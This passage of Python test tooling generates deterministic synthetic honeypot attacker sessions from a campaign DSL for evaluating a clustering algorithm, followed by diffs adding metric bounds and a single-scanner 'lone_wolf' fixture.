    # Anchor the synthetic timeline at a fixed epoch so determinism holds
    # across runs regardless of wall clock.
    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)

    # One attacker record per actor: the cross-session identity the
    # clusterer is supposed to recover. first_seen/last_seen start at the
    # epoch and are replaced once the actor's first session is emitted.
    actor_attackers: dict[str, SyntheticAttacker] = {}
    for actor in c["actors"]:
        a_id = _stable_uuid(rng, "att")
        att = SyntheticAttacker(
            attacker_id=a_id,
            ip=_stable_ip(rng),
            asn=int(actor.get("asn", 0)),
            ja3=actor.get("ja3"),
            hassh=actor.get("hassh"),
            first_seen=epoch,
            last_seen=epoch,
            truth_campaign_id=campaign_id,
            truth_actor_id=actor["id"],
        )
        actor_attackers[actor["id"]] = att
        attackers.append(att)

    # Walk phases in declared order. Each phase produces N sessions
    # against random deckies (or a sticky one if previous_success).
    decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
    last_success_decky: dict[str, str] = {}
    for ph in c["phases"]:
        phase = UKCPhase(ph["name"])
        if phase not in OBSERVABLE_PHASES:
            continue  # pre-target phase; emit nothing
        # A phase without an explicit actor belongs to the first declared one.
        actor_id = ph.get("actor") or c["actors"][0]["id"]
        att = actor_attackers[actor_id]
        actor_spec = next(a for a in c["actors"] if a["id"] == actor_id)

        sig = ph.get("tool_signature") or {}
        commands = sig.get("commands")
        if commands is None:
            # Fall back to the per-phase defaults only when the DSL gives
            # no commands; a phase missing from the table means "none".
            commands = _PHASE_DEFAULT_COMMANDS.get(phase, [])
        creds_list = sig.get("credentials") or []
        c2 = sig.get("c2_callback")
        payload_seed = sig.get("payload_hash")
        payload = _payload_hash(payload_seed) if payload_seed else None

        target_sel = ph.get("target_selector") or {}
        n_sessions = int(target_sel.get("count", 1))
        if target_sel.get("decky") == "previous_success":
            decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
        else:
            decky_choices = decky_pool

        # Schedule sessions across the campaign window, respecting the
        # actor's hours_active_utc and pause_windows.
        active_hours = actor_spec.get("hours_active_utc", list(range(24)))
        jitter = int(actor_spec.get("jitter_seconds", 60))
        for _ in range(n_sessions):
            day = rng.randint(0, max(0, duration_days - 1))
            if _is_paused(day):
                # Move the session to some unpaused day; if the whole
                # campaign window is paused, the session is dropped.
                if not unpaused_days:
                    continue
                day = rng.choice(unpaused_days)
            hour = rng.choice(active_hours)
            day_start = epoch + timedelta(days=day)
            started_at = _hour_to_offset(rng, day_start, hour, jitter)
            duration_s = float(ph.get("dwell_seconds", 5))
            sess = SyntheticSession(
                session_id=_stable_uuid(rng, "sess"),
                attacker_id=att.attacker_id,
                decky_id=rng.choice(decky_choices),
                started_at=started_at,
                duration_s=duration_s,
                phase=phase,
                commands=list(commands),
                credentials_tried=[tuple(p) for p in creds_list],  # type: ignore[misc]
                payload_hash=payload,
                c2_callback=c2,
                truth_campaign_id=campaign_id,
                truth_actor_id=actor_id,
            )
            sessions.append(sess)
            att.sessions.append(sess)
            # Track the observation window from the sessions themselves,
            # not by treating the epoch as a "not set yet" marker: a
            # session can legitimately start at, or (through negative
            # jitter) before, the epoch.
            if len(att.sessions) == 1:
                att.first_seen = started_at
                att.last_seen = started_at
            else:
                att.first_seen = min(att.first_seen, started_at)
                att.last_seen = max(att.last_seen, started_at)
            # If this phase is a "successful entry," remember the decky
            # for any subsequent previous_success target_selector.
            if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
                last_success_decky[actor_id] = sess.decky_id
def _emit_noise(
    noise_cfg: dict[str, Any],
    rng: random.Random,
    attackers: list[SyntheticAttacker],
    sessions: list[SyntheticSession],
) -> None:
    """Append ``scanner_count`` background scanners to the output lists.

    Every scanner is its own truth campaign and actor, has no JA3/HASSH,
    and produces exactly one one-second Delivery session somewhere in the
    first day after the fixed epoch. A missing or non-positive
    ``scanner_count`` emits nothing.
    """
    scanner_total = int(noise_cfg.get("scanner_count", 0))
    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
    # range() of a non-positive count is empty, so no explicit guard is needed.
    for index in range(scanner_total):
        label = f"noise-scanner-{index:04d}"

        # RNG draw order is part of the determinism contract:
        # attacker id, ip, asn, start offset, session id, decky.
        scanner = SyntheticAttacker(
            attacker_id=_stable_uuid(rng, "att"),
            ip=_stable_ip(rng),
            asn=rng.randint(1000, 65000),
            ja3=None,
            hassh=None,
            first_seen=epoch,
            last_seen=epoch,
            truth_campaign_id=label,  # the scanner is a campaign of one
            truth_actor_id=label,
        )
        attackers.append(scanner)

        # A single Delivery-phase touch with no follow-up.
        seen_at = epoch + timedelta(seconds=rng.randint(0, 86400))
        touch = SyntheticSession(
            session_id=_stable_uuid(rng, "sess"),
            attacker_id=scanner.attacker_id,
            decky_id=f"decky-{rng.randint(1, 20):02d}",
            started_at=seen_at,
            duration_s=1.0,
            phase=UKCPhase.DELIVERY,
            commands=[],
            credentials_tried=[],
            payload_hash=None,
            c2_callback=None,
            truth_campaign_id=label,
            truth_actor_id=label,
        )
        sessions.append(touch)
        scanner.sessions.append(touch)
        scanner.first_seen = scanner.last_seen = seen_at
def load_yaml(path: str | Path) -> dict[str, Any]:
    """Load a fixture file as UTF-8 YAML and return its top-level mapping.

    Deliberately minimal so tests can just as well build specs inline.

    Raises:
        DSLValidationError: if the document's top level is not a mapping.
    """
    document = yaml.safe_load(Path(path).read_text(encoding="utf-8"))
    if isinstance(document, dict):
        return document
    raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")

View File

@@ -0,0 +1,17 @@
# Bounds for fixture 3 (lone_wolf).
#
# Every actor in this fixture is a singleton (the wolf itself, plus
# every background-noise scanner). A correct clusterer puts each in
# its own cluster; that's a perfect score.
#
# Bounds are deliberately loose at first — we ratchet them up as the
# algorithm matures. Loosening any bound to make CI pass requires
# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2).
adjusted_rand_index:
min: 0.85
homogeneity:
min: 0.90
completeness:
min: 0.80
singleton_recall:
min: 0.95

32
tests/fixtures/campaigns/lone_wolf.yaml vendored Normal file
View File

@@ -0,0 +1,32 @@
# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2.
#
# One opportunistic scanner, Delivery phase only, no follow-up, no shared
# signals with anyone else. Surrounded by background noise. The clusterer
# must keep the wolf and every noise scanner as their own singleton —
# none should be absorbed into anyone else.
#
# This is the simplest of the six fixtures and exists primarily to prove
# the end-to-end pipeline (DSL → factory → clusterer → metrics) before
# we invest in the harder scenarios.
corpus:
campaigns:
- campaign:
id: lone-wolf-001
actors:
- id: wolf-a
asn: 14061
ip_pool: sticky
ja3: null
hassh: null
hours_active_utc: [3, 4, 5]
jitter_seconds: 30
phases:
- name: delivery
actor: wolf-a
target_selector:
service: any
count: 1
dwell_seconds: 1
duration_days: 1
noise:
scanner_count: 8